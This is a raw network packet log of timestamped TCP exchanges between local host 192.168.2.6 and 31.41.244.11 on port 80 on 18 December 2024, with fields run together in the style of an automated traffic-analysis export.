                                                                                                                                                                  Dec 18, 2024 11:09:26.086441040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.086505890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.086549044 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.087801933 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.087848902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.087907076 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.087949038 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.089210987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.089225054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.089257956 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.090589046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.090637922 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.090698957 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.090738058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.091963053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.092005014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.092041969 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.092080116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.093329906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.093374014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.093472958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.093522072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.094686031 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.094731092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.094780922 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.094818115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.096257925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.096302986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.096375942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.096414089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.097603083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.097642899 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.097693920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.097735882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.098880053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.098918915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.098931074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.098969936 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.100189924 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.100230932 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.100301027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.100341082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.101567984 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.101603985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.101763010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.101800919 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.102973938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.103013039 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.103066921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.103101969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.104309082 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.104367971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.104420900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.104459047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.105756044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.105818033 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.105834007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.105874062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.107090950 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.107132912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.107193947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.107233047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.108583927 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.108637094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.108709097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.108750105 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.109849930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.109908104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.109947920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.109988928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.111236095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.111289978 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.111341953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.111382961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.112591028 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.112643957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.112677097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.112721920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.113986015 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.114036083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.114074945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.114116907 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.115394115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.115451097 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.115549088 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.115592003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.116734982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.116789103 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.116879940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.116920948 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.118021011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.118068933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.231098890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.231188059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.231192112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.231231928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.231551886 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.231596947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.231702089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.231743097 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.232568979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.232615948 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.232635975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.232678890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.233592987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.233654976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.233695030 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.233741045 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.234636068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.234683037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.234790087 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.234838963 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.235651970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.235697985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.235765934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.235807896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.236676931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.236721039 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.236779928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.236823082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.237670898 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.237714052 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.237720966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.237762928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.238661051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.238703966 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.238740921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.238782883 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.239636898 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.239679098 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.239751101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.239793062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.240618944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.240663052 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.240701914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.240742922 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.241688967 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.241731882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.241775990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.241816044 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.242634058 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.242676020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.242717981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.242753983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.243566036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.243603945 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.243664980 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.243709087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.244575977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.244626999 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.244656086 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.244699001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.245527983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.245572090 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.245609045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.245651007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.246484995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.246527910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.246666908 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.246711969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.247467995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.247514009 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.247622013 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.247663021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.248480082 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.248522997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.248590946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.248631954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.249468088 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.249510050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.249526978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.249567986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.250497103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.250540972 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.250616074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.250658989 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.251471996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.251516104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.251586914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.251627922 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.252404928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.252449989 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.252552032 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.252593994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.253416061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.253459930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.253469944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.253514051 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.254373074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.254445076 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.254477978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.254518986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.255399942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.255445957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.255490065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.255532980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.256325960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.256366968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.256422997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.256460905 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.257318974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.257369995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.257421017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.257458925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.258286953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.258327961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.258402109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.258444071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.259277105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.259325981 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.259407997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.259450912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.260277033 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.260323048 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.260391951 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.260435104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.261240005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.261281013 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.261326075 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.261364937 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.262224913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.262270927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.262418985 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.262459993 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.263195038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.263237000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.263439894 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.263483047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.264182091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.264225960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.264259100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.264300108 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.265182972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.265239954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.265381098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.265422106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.266171932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.266217947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.266278982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.266324043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.267349005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.267400026 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.267424107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.267461061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.268141031 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.268181086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.268223047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.268264055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.269117117 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.269155979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.269212961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.269252062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.270157099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.270200014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.270236969 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.270272017 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.271075010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.271116972 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.271217108 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.271251917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.272083998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.272126913 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.272166014 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.272205114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.273042917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.273083925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.273121119 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.273153067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.274023056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.274068117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.274137974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.274175882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.275002956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.275048018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.275118113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.275158882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.276026011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.276072025 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.276101112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.276139975 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.276947975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.276992083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.277110100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.277148008 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.277966022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.278006077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.278069973 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.278109074 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.278908014 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.278947115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.278948069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.278981924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.279911041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.279957056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.280136108 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.280173063 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.280891895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.280930042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.280997038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.281033993 CET4991280192.168.2.631.41.244.11
